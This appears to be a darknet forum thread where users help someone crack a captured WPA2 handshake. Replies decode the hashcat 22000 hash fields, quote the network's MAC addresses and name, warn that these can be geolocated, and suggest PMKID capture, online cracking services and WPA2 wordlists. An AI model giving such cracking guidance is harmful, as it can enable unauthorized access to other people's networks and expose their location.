Can anyone help me to decrypt wpa2 handshake : hacking | Torhoo darknet markets

I would recommend not sharing WPA2 handshake on public forum if your goal is anonymity.

In theory, law enforcement could break handshake, recover WiFi password and collaborate with internet providers to identify customers with specific WiFi password.

Exist sites like WIGGLE that help locate WiFi using unique SSID. However, extracting WiFi SSID or BSSID from hash seems problematic.

I'd first try to crack it online.
There are tools both paid and free that support pcap and pcapng capture files, you can use their resources.

i echo moonship

by posting that hash on the darknet you give away some info you may not want to. you are fine, don't worry, i will try to explain why for learning purposes. i may get my terminology wrong as it has been awhile since i did any of this stuff. so i welcome any corrections or additions anyone has.

by the way - good job getting the pcap and converting it to 22000 format - that is half the battle. good job!
look into "PMKID" now and see about getting some WPA*01 instead of your WPA*02 from the start of your 22000 line. note: the WPA*02 at the beginning of your hash does not mean wpa2.


here is the explanation of the 22000 hash line you provided in your original post:
WPA*02*MIC*MAC_AP*MAC_CLIENT*ESSID*NONCE_AP*EAPOL_CLIENT*MESSAGEPAIR


the MAC_AP of the router or phone hotspot you got this handshake from is:
c8:ea:f8:28:4a:19
so it may be some form of zte phone or zte portable hotspot, not sure if zte makes routers


the MAC_CLIENT of the device you used to get it is:
1e:3e:bb:46:23:29
assuming you didn't spoof your mac before grabbing it.
edit01: actually i may be wrong here, that may be the client that was handshaking. if this was a WPA*01 hash then then the client would be you


the ESSID (most likely the name of the access point in this case is)
49646f6f6d2034475f3834413139
or if you convert from hex
Idoom 4G_84A19

Idoom may be the name of the phone or user - but 4G_84A19 is probably some form of default naming convention someone could dig deeper into and possible get the specific device. the 4G makes me think this is a phone's hotspot.


the biggest issue is the one moonshine stated already. anyone can go on wigle(dot)net and search c8:ea:f8:28:4a:19 on the BSSID field and possible get a geolocation hit. if they do get a hit then one could assume it is your next door neighbor and you live one door over. or at the very least that you were around that spot.

so if you do not care about that information being out on the darkweb then cool. but if you weren't aware of that information being in that hash - be careful.

if you want to continue - try getting better wordlists from sites like weakpass(dot)com. WPA2 word lists look for the files with "_w" at the end and already be filtered for 8 to 30 characters with the correct characters. there is also rules and i think masks that can be applied to wordlists.